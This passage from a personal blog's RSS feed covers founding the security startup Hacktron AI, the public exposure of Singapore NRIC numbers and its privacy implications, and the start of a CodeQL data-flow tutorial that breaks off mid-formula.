universe — the world would be different if <em>I</em> had never existed, sure, but if you were to erase a few more people (like
my parents and grandparents) from the timeline, the world would still be the same. This was sort of the bare minimum
I could do to justify my existence as a zero-sum to the universe.</p>
<p>I think I want to optimise for scalable impact. I think there are many ways to make an outsized impact on a small number of people —
just consider how many strangers you've met in your life that have influenced you in profound ways. But I think if someone has
the ability and resources to do this on a much larger scale, they have a moral obligation to do so. I think startups are still the
best way to do this, but again, what does impact even mean? Is it small incremental improvements to the world, in which case we can
achieve a good approximation of the optimal solution with a hill climbing algorithm that chooses at each step the best local improvement?
Or is the optimal solution something that is fundamentally different, and requires careful consideration of the problem space at the very beginning
(and once you get it wrong, you can't really fix it)?</p>
<h2>2 months</h2>
<p>Even this goal is full of contradictions. If I had 2 months left to live, my priorities would likely shift dramatically
towards a local optimum — I would want to spend time with my family and aim to make an outsized impact on a few people
that I am close to.</p>
<p>Some people are just worth more than others, and I think that's okay. I told the person who asked me this question that
if they had 2 months left to live, they should spend it travelling the world, and I would drop everything to join them,
because I knew they would have done the same for me.</p>
<h2>Risk aversion</h2>
<p>I think that's part of why sometimes I find this path so scary. Prospect theory tells us that we are risk-averse when
it comes to gains, but risk-seeking when it comes to losses.</p>
<p>If I were to die tomorrow, choosing a "safer" path would mean that I would have lived a life that was less impactful,
but it would have been impactful nonetheless since I would have been able to provide for people I care about and spend
much more time with them. The risk-seeking path, on the other hand, would have had much more potential for impact, but
the losses from failure (or dying tomorrow) would have been much more pronounced.</p>
<p>But if we think about this from a rational perspective, the expected value of the risk-seeking path is still higher.
It would be really sad if I were to die tomorrow, but that's likely not going to happen. But if there's a chance that
I could do something that changes the world profoundly, then pure statistics would tell us that it's worth taking that risk.</p>
<h2>The point?</h2>
<p>I keep circling back to one question:</p>
<blockquote>
<p>How can a single life compound beyond itself?</p>
</blockquote>
<p>The answer I keep landing on is work that continues to widen its radius even when I am no longer around to steer it.
Start-ups are my chosen vehicle, but the deeper principle is leverage: building systems, tools, or ideas that unlock the efforts of thousands of others.</p>
<p>There have been some small examples of this in my life so far. One example: I started a CTF team in Singapore that became the top team in the
country for some time and qualified for a bunch of international competitions, showing to many that Singaporeans can be competitive at the highest levels of
competitive hacking globally. I've left the team and am no longer active in CTFs, but the team is still active and the secondary effects that we created
are still being felt today.</p>
<p>Because leverage rewards patience, my best hedge against the chance of “dying tomorrow” is to live today as though I might, while still investing as though I won’t. Concretely, that means:</p>
<ol>
<li><strong>Designing for continuity</strong> — doing things with the expectation that I will not be around to see them through.</li>
<li><strong>Choosing problems with second-order effects</strong> — solving security will create a safer world that outlives me. If I ever get the opportunity though,
I want to work on climate change. That's the single biggest problem of my generation, but right now I don't have the skills or power to tackle it.</li>
<li><strong>Measuring impact the way investors track compound interest</strong> — returns are tiny at first, but they grow exponentially over time. If we do the most
locally optimal thing at every step, we will eventually get pretty far.</li>
</ol>
<p>If the experiment fails, at least I will have spent my finite hours pushing on the biggest fulcrum I was capable of finding, and sharing that journey with the people who matter most.
And if it works, the value created will dwarf anything I could have done by playing safe. Either way, the only unacceptable outcome is to leave the lever untouched.</p>
<p>So the next time someone asks what would happen if I died tomorrow, I hope the honest answer will be: <em>“Less than you’d think, because the work is built to outlive me.”</em></p>
<figure class="mx-auto"><img alt="The dream team behind Hacktron" loading="lazy" width="4032" height="3024" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fteam.b4bb8d4d.jpg&amp;w=3840&amp;q=75 1x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fteam.b4bb8d4d.jpg&amp;w=3840&amp;q=75"><figcaption class="text-center">The dream team behind Hacktron</figcaption></figure>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
        <item>
            <title><![CDATA[Leaving Cambridge and co-founding Hacktron AI]]></title>
            <link>https://www.analogue.computer/blog/hacktron</link>
            <guid>https://www.analogue.computer/blog/hacktron</guid>
            <pubDate>Fri, 16 May 2025 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<h2>TL;DR</h2>
<p>In a few weeks, I'll be leaving Cambridge and working on <a href="https://www.hacktron.ai/">Hacktron AI</a> full-time.</p>
<p>I am finishing up my second-year exams in June, after which I'll be taking time away from my studies. While I've wanted to intermit for quite some time for personal reasons, this will also allow me to focus on Hacktron AI,
which I've co-founded with <a href="https://s1r1us.ninja/">Mohan</a> and <a href="https://x.com/rootxharsh">Harsh</a>. We're the first company to be backed by <a href="https://www.projecteurope.co">Project Europe</a>, an ambitious initiative
by some of the best European founders and VCs to support the next generation of European talent in building world-class companies.</p>
<p>This is a dream come true for me in many ways.</p>
<figure class="mx-auto w-2/3"><img alt="Meme" loading="lazy" width="581" height="417" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fmeme.1f12734e.jpg&amp;w=640&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fmeme.1f12734e.jpg&amp;w=1200&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fmeme.1f12734e.jpg&amp;w=1200&amp;q=75"><figcaption class="text-center">TL;DR</figcaption></figure>
<h2>Taking the leap of faith</h2>
<p>Cambridge has so far been an incredibly transformative experience, and one thing it has taught me is relentless ambition. When I first arrived, my goal was simply to prove myself and do well in
exams. When it came to my second year, I started feeling incredibly pressured to figure out what I wanted to do with my life post-graduation. As a natural result of being surrounded by some of
the most ambitious people in the world, in the past year alone, I've found myself considering all 3 stereotypical paths for a CS student:</p>
<ol>
<li>FAANG — I got an internship offer from Amazon.</li>
<li>Quant — I turned it down for an internship at Optiver.</li>
<li>Startup — I'm ultimately turning down the internship to go all in on Hacktron AI.</li>
</ol>
<p>I think I've always been a builder at heart. And the beauty of that is that if you work hard enough, you can will ideas into existence. I just never knew that
<em>you could just do things</em> and that you didn't need to wait for "the right moment". The right moment isn't a thing, and with the rate at which the world is changing
today, there is only opportunity cost to waiting. Embracing this mindset has opened up new avenues for me, and I have some people to thank for that.</p>
<ul>
<li><a href="https://www.linkedin.com/in/max-r-103462221/">Max</a>, <a href="https://www.linkedin.com/in/dominik-diak/">Dom</a> and (another) <a href="https://www.linkedin.com/in/max-mugnaioni/">Max</a> from
<a href="https://www.joinef.com/">Entrepreneur First</a> for being some of the first people to challenge me to think critically about what I wanted to do with my life.</li>
<li><a href="https://x.com/vedaangh">Ved</a>, <a href="https://x.com/swar_ja">Swarnim</a>, and <a href="https://x.com/fogelin">Oli</a> for carrying the Cambridge builder scene with <a href="https://www.cuai.org.uk">CUAI</a>.</li>
<li><a href="https://www.fitz.cam.ac.uk/fitzelerate">Fitzelerate</a> and <a href="https://queens.shorthandstories.com/queens-entrepreneurial-society/index.html">Queens' Entrepreneurship Society</a> for
blessing me with the thrill of building and the confidence to pitch my first real project, <a href="https://www.eurekapad.app">EurekaPad</a>, which I started with <a href="https://www.linkedin.com/in/adelyn-w-a2b779228">Adelyn</a>,
<a href="https://www.linkedin.com/in/kai-xuan-lee">Kai Xuan</a>, and <a href="https://www.linkedin.com/in/sebastian-yii">Sebastian</a>.
Ultimately I felt the vision was a bit too small, and it would be nicer as a bootstrapped side project rather than a venture-scale startup.</li>
<li><a href="https://www.linkedin.com/in/joshualimyaohong">Josh</a> for bringing cool people together with <a href="https://www.cambridgeuniversityentrepreneurs.com">Cambridge University Entrepreneurs</a>.</li>
<li><a href="https://www.linkedin.com/in/euanong">Euan</a> for this <a href="https://space.ong.ac/escaping-flatland">well-written article</a> about figuring out a meaningful career path.</li>
<li>And of course, <a href="https://www.linkedin.com/in/kittymm/">Kitty</a>, <a href="https://www.linkedin.com/in/kieranleehill/">Kieran</a> and <a href="https://www.linkedin.com/in/harrystebbings">Harry</a> for being the absolute legends that they are and making Project Europe the movement that it is.</li>
</ul>
<p>I knew that once I graduated from university, settled into a job, and started having actual responsibilities, there would probably never be a chance as good as now to drop everything and
go all in on something I believe in.</p>
<p>Taking the leap of faith hasn't been easy, though. Up to this point, I think my life has been optimized around moving up the social ladder and building a better life
for myself and my family. For people like me, who have been raised in a culture where success is still largely defined by the prestige of your university and the number of
zeros in your bank account, I think being an entrepreneur is one of those things most people only fantasize about.</p>
<p>It's for that reason that I'm immensely grateful that my Asian parents have supported me every step of the way. I think on some level, they've always understood my desire for purpose.</p>
<h2>What we're building</h2>
<p>Thanks to AI, the world is writing more code than ever. The capabilities of threat actors to scale attacks will also increase exponentially, at a time when the number of vulnerabilities in the world
is also exploding. We are building an equal and opposite force that democratizes security expertise for companies that don't have the resources or time to think deeply about security.</p>
<p>Hacktron is an autonomous security researcher that lives in every part of the software development lifecycle. It finds, triages, and fixes vulnerabilities in codebases, at a fraction of the cost of a penetration test while delivering equivalent results.</p>
<p>So far, Hacktron has:</p>
<ul>
<li>Performed an audit for <a href="https://gumroad.com/">Gumroad</a> where it autonomously identified a critical SQL injection vulnerability and several other high-severity vulnerabilities, and fixed them via pull requests.</li>
<li>Identified multiple critical vulnerabilities in open-source projects (CVEs pending).</li>
<li>Received its <a href="https://x.com/HacktronAI/status/1922528253895483618">first bounty</a> from Bugcrowd.</li>
</ul>
<p>And we're just getting started. Read more about our mission and approach on our <a href="https://www.hacktron.ai/blog">blog</a>.</p>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
        <item>
            <title><![CDATA[My NRIC number was public for four days. Should it have been?]]></title>
            <link>https://www.analogue.computer/blog/my-nric-number-was-public</link>
            <guid>https://www.analogue.computer/blog/my-nric-number-was-public</guid>
            <pubDate>Sun, 15 Dec 2024 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<p>Last Friday, I was getting off the bus in downtown Houston when I received a rather alarming message from a friend
in Singapore.</p>
<figure class="mx-auto w-2/3"><img alt="Screenshot of a message from a friend" loading="lazy" width="844" height="1276" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ftext.163d07d2.jpeg&amp;w=1080&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ftext.163d07d2.jpeg&amp;w=1920&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ftext.163d07d2.jpeg&amp;w=1920&amp;q=75"><figcaption class="text-center">That's not good...</figcaption></figure>
<p>To set the context: my National Registration Identity Card (NRIC) number — what most will consider the equivalent of a Social Security Number
in the United States, and the National Insurance Number in the United Kingdom — was on a public government website, publicly accessible free
of charge to anyone who knew where to look. This was not a data breach, but <em>a feature</em> that was added to the Accounting and Corporate
Regulatory Authority (ACRA) portal, which is used by businesses to look up information about other businesses and individuals.</p>
<p>The feature was released on the 9th of December, and on the 13th of December, <a href="https://mothership.sg/2024/12/nric-numbers-publicly-listed-acra/">Mothership reported on it</a>.
You could search for the name of any person, and if they were associated with a business, their NRIC number would be displayed free of charge,
and a "full profile" — with additional information, like a citizen's residential address — is for sale for S$33.</p>
<figure class="mx-auto"><img alt="Screenshot of the ACRA portal" loading="lazy" width="2035" height="1050" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fpeople-search.fc44b6fd.png&amp;w=2048&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fpeople-search.fc44b6fd.png&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fpeople-search.fc44b6fd.png&amp;w=3840&amp;q=75"><figcaption class="text-center">The ACRA portal</figcaption></figure>
<p>My information was probably on there because I registered a business in Singapore a while ago which I no longer actively operate.
According to the <a href="https://www.acra.gov.sg/training-and-resources/facts-and-figures/statistical-highlights-2023">latest data</a> from ACRA,
as of the end of 2023, there were 588,764 registered businesses in Singapore, with a significant portion being owned by Singaporeans.
This means that hundreds of thousands of individuals had their NRIC numbers exposed, just like me.</p>
<p>This feature has since been disabled, but the damage has probably already been done. This was public for four days, and it is not
unreasonable to assume that someone could have scraped much of the data in that time. While this is disturbing on its own, what I'm
more concerned about is the subsequent response from the government, and the discussion around the sensitivity of NRIC numbers. I think this
is relevant to many of my readers, even if you are not from Singapore, because it involves a slightly more nuanced discussion about the
differences between security and privacy.</p>
<h2>Secret or not?</h2>
<p>Following the disabling of the feature, the Ministry of Digital Development and Information (MDDI) <a href="https://www.channelnewsasia.com/singapore/nric-numbers-masking-bizfile-acra-mddi-government-public-education-pdpa-4804801">responded to queries from the media</a>.</p>
<blockquote>
<p>MDDI said in its statement that NRIC numbers are meant to be used to identify individuals and "should be used as such".</p>
<p>"As a unique identifier, the NRIC number is assumed to be known, just as our real names are known," said the ministry.</p>
<p>"There should therefore not be any sensitivity in having one’s full NRIC number made public, in the same way that we routinely share and reveal our full names to others."</p>
<p>It added that it has been a practice for some time to use masked NRIC numbers. But there is no need to mask the number, nor is there much value in doing so, said MDDI.</p>
<p>"Using some basic algorithms, one can make a good guess at the full NRIC number from the masked number, especially if one also knows the year of birth of the person."</p>
<p>This is why public agencies are phasing out the use of masked NRIC numbers, so as to avoid giving a "false sense of security", said MDDI.</p>
</blockquote>
<p>This is an interesting perspective, which came as a shock to many. For years, the Personal Data Protection Act (PDPA) has made it illegal for
organizations to collect, use, or disclose NRIC numbers without a valid reason, with a financial penalty of up to S$1 million (although government
agencies are exempt) — this has led many to treat NRIC numbers as sensitive information that should be kept secret.</p>
<p>This means that many organizations that <em>do</em> collect NRIC numbers often use them as part of identity verification. My banking app, for example,
asks for my NRIC and a 6-digit PIN to log in. My insurance company sends me policy documents in a password-protected PDF, with part of the
password being my NRIC number. Given the current state of affairs, I'll be very concerned if my NRIC number is leaked.</p>
<p>But I'm not the person you should be worried about here — it's the people who are likely to believe the scammer on the other end of the phone who
claims to be from the government and backs that up by reciting their NRIC number. Or worse, people who set their banking PIN to contain their birth year:
this sort of feature makes it much easier to spray-and-pray NRIC and PIN combinations to gain access to someone's bank account, since the birth year is
the first two digits of the NRIC number.</p>
<p>That said, it is true that full NRIC numbers are easily guessable given the masked number and the year of birth. The algorithm for calculating
the checksum (the last letter of the NRIC number) is <a href="https://www.ngiam.net/NRIC/NRIC_numbers.pdf">publicly available</a>, and the <a href="https://en.wikipedia.org/wiki/National_Registration_Identity_Card#Structure_of_the_NRIC_number.2FFIN">structure</a>
of the NRIC number is well-known. But I imagine that for many, the contention is not about whether the NRIC is masked or not, but about whether
it should be public at all. For instance, one might feel slightly safer disclosing only the street they live on, rather than their full address,
but that doesn't mean they should be comfortable with their street address being publicly searchable by anyone on the internet.</p>
<blockquote>
<p>The ministry said it recognises that some Singaporeans have "long treated" the NRIC number as private and confidential information, and will need time to adjust to this "new way of thinking".</p>
<p>In 2025, MDDI and the Personal Data Protection Commission (PDPC) will be carrying out public education about the purpose of the NRIC number and "how it should be used freely as a personal identifier".</p>
</blockquote>
<p>Perhaps the timing just wasn't right, and there is a perfectly reasonable world where the NRIC number is public and everyone is fine with it. But this probably
doesn't have to be either/or. Most web services use email addresses as unique account identifiers, and one probably won't consider their email address
to be top-secret information. Yet, it'll likely be a bad idea to make the email addresses of all registered users public. So if the NRIC number is to be
used as a unique identifier, maybe it should be treated with at least the same level of care.</p>
<h2>Scalability</h2>
<p>When we think about threat models, it's often tempting to think about the worst-case scenario. But the reality is that most people are not going to be
targeted by a sophisticated attacker who is willing to invest significant time and resources — and those who are probably either have the means to protect
themselves or have bigger problems to worry about. The real danger is in the low-hanging fruit that can be exploited at scale.</p>
<p>For instance, think about the chip-and-pin terminal relay attack. It's a conceptually obvious decades-old attack that involves intercepting the communication
between a chip card and a terminal, and relaying it to another terminal to make a transaction for a higher amount. But it's not used in practice because it's
not scalable: you need to be physically close to the victim, and you need to have a way to relay the communication in real-time. So while it's a cool attack,
no one's bothered fixing it because it's not a real threat.</p>
<figure class="mx-auto"><img alt="A relay attack" loading="lazy" width="956" height="424" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Frelay.9c8e9f2b.png&amp;w=1080&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Frelay.9c8e9f2b.png&amp;w=1920&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Frelay.9c8e9f2b.png&amp;w=1920&amp;q=75"><figcaption class="text-center">A relay attack</figcaption></figure>
<p>On the other hand, attacks like the no-PIN attack which only require a stolen card to be used were a much bigger problem, so the industry had to change the protocol
entirely.</p>
<p>The reason it'll be a bad idea to make the email addresses of all registered users public is because it enables a stupidly simple attack at scale: you can
now send phishing emails to everyone who has ever signed up for your service, and you'll probably get a few people to click on the link. You can also spray
passwords from a data breach against all the email addresses you have, and you'll probably get a few hits. So while any one individual's email address is
probably not that sensitive, making <em>all</em> email addresses easily scrapable would be really bad (and if you could dump the email addresses of all users of
a popular service, you could probably get a handsome bug bounty or if you're less ethical, make a lot of money selling that data).</p>
<p>At the same time, for the individual, letting one person know your email address is probably not a big deal — you can just block them, right? But if you
let everyone know your email address, that's probably called an invasion of privacy. The scale at which the information is exposed matters.</p>
<p>In fact, there is probably a lot of "unique identifier" information that can be considered "not sensitive" on its own, but you'll probably not be comfortable
with being made public. Some simple examples:</p>
<ul>
<li>Your phone number uniquely identifies you among all people who have a phone number, but you probably don't want any random person — maybe a creep
you met at a bar that one time — to be able to look up your phone number and call you.</li>
<li>Your home address is unique to the people who live with you — likely your family — but you probably don't want people or unsolicited mail to show up at your door uninvited.</li>
</ul>
<p>While it's true that these examples facilitate some kind of other interaction — a phone number is used to call you, and a home address is used to send you mail — and the NRIC
doesn't have more direct utility, the point is that the NRIC number has become part of what most people consider to be their personal, private information. In fact, even the NRIC
number itself already contains one's birth year. And when enough of these pieces of information are put together, they can be used to paint a very detailed picture of a person's life
— the holy grail of scammers, stalkers, and data brokers.</p>
<p>It's fine for one website to store metadata about me, keyed with my NRIC number. But if that website, and a bunch of other websites, make my NRIC and its associated metadata public,
then I'd expect to be able to find a good profile of myself available for sale on the internet or the dark web. And that's stretching my comfort zone.</p>
<h2>Privacy vs. security</h2>
<blockquote>
<p>"Likewise, the NRIC number should not be used as passwords, just as we should not be using our names as passwords. If the NRIC number is used for authentication, it would have to be kept a secret, which would defeat its main purpose as a unique identifier," MDDI added.</p>
</blockquote>
<p>Subsequently, the PDPC also <a href="https://www.channelnewsasia.com/singapore/pdpc-nric-numbers-personal-data-protection-4807096">made a similar point</a> about authentication:</p>
<blockquote>
<p>The commission noted that it had previously taken action against organisations which used NRIC numbers for authentication and "breached their data protection obligations".</p>
<p>It said: "A person’s name and NRIC number identifies who the person is. Authentication is about proving you are who you claim to be. This requires proof of identity, for example, through a password, a security token or biometric data.</p>
<p>"As the NRIC number is not a secret, it should not be used by an organisation for authentication purposes."</p>
</blockquote>
<p>I believe that for many technical folk, this wouldn't be a controversial statement. Indeed, using NRIC numbers as "what you know" in authentication is inherently flawed.
If the intent is to make NRIC numbers public, there is much work to be done to ensure that systems we use are secure. Imagine ordering a plate of chicken rice
and getting a queue number. In the ideal case, you should not be able to just walk up to the counter and say "I'm number 42". You should have to present your queue number
or receipt. But most places don't do this, and the same is true for many systems that depend on NRIC numbers for authentication.</p>
<p>But this seems to be conflating the issues of privacy and security. While there is much to be said about the current flawed implementations of NRIC-based authentication,
the fact that we want to use NRIC numbers as usernames or account identifiers doesn't change many's expectations of privacy.</p>
<p>Going by this reasoning, should identifiers like passport numbers, biometric data stored on my phone, and even credit card numbers be public too? Afterall, all of these
require at least one second factor of authentication to be useful (a convincing face, access to my physical phone, CVV number).</p>
<p>I think the distinction between privacy and security is important. Privacy is about controlling who has access to your information, while security is about ensuring that
only the right people have access to your information. The two are related, but they are not the same. One would generally consider Google to be secure — I don't lose sleep
over the idea that someone might hack into my Google account — but we all know that Google sells a lot of our data to advertisers. So while I have strong security controls
over my Google account, I have very little privacy control over it.</p>
<p>The main contention then is about whether we should consider NRIC numbers to be personally identifiable information (PII) that we should expect reasonable privacy over.
For me at least, the answer is yes. At the very least, the correlation between my NRIC number and other information about me, in the hands of unsavoury characters, would
create inherent risk that I would not be comfortable with.</p>
<p>This is echoed in the <a href="https://www.pdpc.gov.sg/-/media/files/pdpc/pdf-files/advisory-guidelines/advisory-guidelines-for-nric-numbers---310818.pdf">PDPC's guidelines on NRIC numbers</a>:</p>
<blockquote>
<p>As the NRIC number is a permanent and irreplaceable identifier which can potentially
be used to unlock large amounts of information relating to the individual, the
collection, use and disclosure of an individual’s NRIC number is of special concern.
Indiscriminate or negligent handling of NRIC numbers increases the risk of unintended
disclosure with the result that NRIC numbers may be obtained and used for illegal
activities such asidentity theft and fraud.</p>
</blockquote>
<p>It does not matter how secure our systems are if we are not careful about what information we expose to the world. Even if all systems on our small corner of the world are
perfectly secure, having lived and worked overseas, my NRIC has been used by foreign governments and organizations as a form of identification and for tax purposes as an independent
contractor. Can we be certain that all systems in all countries make the same assumptions about the sensitivity (or lack thereof) of the NRIC number, when in most other countries,
similar identifiers are considered private? One would have to expect systems to know that a Singaporean NRIC number is far less sensitive than a US Social Security Number, or UK
National Insurance Number, and implement different security controls based on that. But that's a big ask.</p>
<p>More importantly, it is impossible to patch human nature. Ever notice how banks always have a disclaimer that they will never call you to ask for your PIN? Yet, people
still fall for scams! No matter how much you try to educate people, there will always be someone who doesn't get the memo. A big part of modern security engineering is
designing systems that are secure by default — making it hard for people to make mistakes — because we've learnt as an industry that education can only go so far.</p>
<h2>Where I stand</h2>
<p>My folks are getting old. Of all things privacy-related, I lose the most sleep over the idea that they might fall for impersonation scams that have been on the rise in Singapore.</p>
<p>I know women in my life who will be deeply uncomfortable with what a highly motivated individual might do when given access to just a little bit more information about them.</p>
<p>Just because I have a secure lock on my door doesn't mean I want to risk someone bringing a lockpick to my doorstep. People used to have to pay good money for this information
on the dark web — surely Economics 101 tells us that there is value in this information. Now it's intended to be free for all. Us cybersecurity folk tend to be a paranoid bunch,
but I think the idea that we shouldn't let people know more about us than they need to should not be controversial.</p>
<p>Let me know what you think. Should the NRIC number be public?</p>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
        <item>
            <title><![CDATA[An introduction to CodeQL and data flow analysis]]></title>
            <link>https://www.analogue.computer/blog/codeql-and-data-flow-analysis</link>
            <guid>https://www.analogue.computer/blog/codeql-and-data-flow-analysis</guid>
            <pubDate>Sat, 21 Sep 2024 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<p>I'll be honest — when I sat through my first-year Discrete Mathematics course, there were plenty of times when I wondered if I'd ever use
any of it in the real world. I'm going to assume that a significant proportion of my audience is studying, has studied, or is about to study Computer Science,
where discrete mathematics is a core part of the foundational curriculum. If you're in that boat, you might be wondering the same thing.</p>
<p>Recently, I've worked extensively with <a href="https://codeql.github.com/">CodeQL</a> — a powerful static analysis tool developed by GitHub — to roll out code scanning
as part of CI/CD pipelines. At the core of this is the QL language, which is used to write queries that reason about code. Compared to its competitors,
CodeQL excels at taint tracking and data flow analysis, which is a fancy way of saying that it's really good at highlighting how potentially malicious or
insecure data can flow through your code and end up in a dangerous place that introduces a security vulnerability.</p>
<p>Now, do you <em>need</em> to understand the mathematics behind CodeQL to use it effectively? Not necessarily. But at its core, QL is a declarative logic programming
language, and thus it's built on a foundation of set theory and predicate logic. I like to understand the tools I use, so I wanted to write a little about
how CodeQL and data flow analysis works under the hood. This is by no means a comprehensive guide, but I hope it serves as a useful introduction for those who
are curious!</p>
<h2>An introduction to CodeQL</h2>
<p>QL is a declarative language. This means that queries are written in a way that describes the desired result, rather than the steps to achieve it. This is
in contrast to imperative languages like Python or Java, where you write code that describes the steps to achieve the desired result.</p>
<p>Here's how a typical CodeQL analysis workflow might look like:</p>
<ol>
<li>The source code is compiled into a database. This database contains the relational representation of the codebase, which includes information about the
structure of the code, the control flow, and the data flow.</li>
<li>The CodeQL engine runs QL queries against the database, similar to how one might run SQL queries against a relational database, to find patterns in the
code that match the query.</li>
<li>The results are exported into the <a href="https://sarifweb.azurewebsites.net/">SARIF</a> format, which can be consumed by CI tools or custom integrations.</li>
</ol>
<p>In this sense, CodeQL is a lot like SQL. One might even recognise the similarities in the basic syntax:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">import</span><span style="color:#F69D50"> javascript</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">from</span><span style="color:#F69D50"> Function</span><span style="color:#F69D50"> f</span></span>
<span data-line=""><span style="color:#F47067">where</span><span style="color:#F47067"> not</span><span style="color:#F47067"> exists</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">CallExpr</span><span style="color:#ADBAC7"> c | c.</span><span style="color:#DCBDFB">getCallee</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> f)</span></span>
<span data-line=""><span style="color:#F47067">select</span><span style="color:#ADBAC7"> f, </span><span style="color:#96D0FF">"This function is never called."</span></span></code></pre></figure>
<p>This query, for example, finds all functions that are never called in a JavaScript codebase. Notice the <code>exists</code> existential quantifier, which checks if
there is at least one <code>CallExpr</code> that calls the function <code>f</code>.</p>
<p>Notice also that QL is object-oriented. <code>CallExpr::getCallee()</code> returns an <code>Expr</code>, which could be a <code>FunctionExpr</code> (which is a <code>Function</code>). However, keep
in mind that class objects in the traditional sense (allocating memory to hold the state of an instance of a class) don't exist in QL. Here, classes
are more like abstract data types that describe sets of existing values.</p>
<h2>Predicates and Binding</h2>
<p>Binding refers to the process of associating variables in a query with sets of values from the CodeQL database. A common mistake is to think of variables
in the imperative sense, where they can be assigned any value at any time. CodeQL works on relations between values, so variables are bound to <strong>finite sets</strong>
of values that already exist.</p>
<p>Let's walk through a simple example.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">import</span><span style="color:#F69D50"> javascript</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">predicate</span><span style="color:#DCBDFB"> sumsTo42</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">Expr</span><span style="color:#F69D50"> x</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">Expr</span><span style="color:#F69D50"> y</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#ADBAC7">  x </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> ConstantExpr</span><span style="color:#F47067"> and</span><span style="color:#ADBAC7"> y </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> ConstantExpr</span><span style="color:#F47067"> and</span></span>
<span data-line=""><span style="color:#ADBAC7">  x.</span><span style="color:#DCBDFB">getIntValue</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">+</span><span style="color:#ADBAC7"> y.</span><span style="color:#DCBDFB">getIntValue</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> 42</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">from</span><span style="color:#F69D50"> Expr</span><span style="color:#F69D50"> x</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">Expr</span><span style="color:#F69D50"> y</span></span>
<span data-line=""><span style="color:#F47067">where</span><span style="color:#DCBDFB"> sumsTo42</span><span style="color:#ADBAC7">(x, y)</span></span>
<span data-line=""><span style="color:#F47067">select</span><span style="color:#ADBAC7"> x, y</span></span></code></pre></figure>
<p>First, consider the domain of all elements in the CodeQL database, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>D</mi><mo>=</mo><mo stretchy="false">{</mo><msub><mi>d</mi><mn>1</mn></msub><mo separator="true">,</mo><msub><mi>d</mi><mn>2</mn></msub><mo separator="true">,</mo><mo>⋯</mo><mtext> </mtext><mo separator="true">,</mo><msub><mi>d</mi><mi>n</mi></msub><mo stretchy="false">}</mo></mrow><annotation encoding="application/x-tex">D=\{d_1, d_2, \cdots, d_n\}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.02778em">D</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mopen">{</span><span class="mord"><span class="mord mathnormal">d</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">1</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.1667em"></span><span class="mord"><span class="mord mathnormal">d</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">2</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.1667em"></span><span 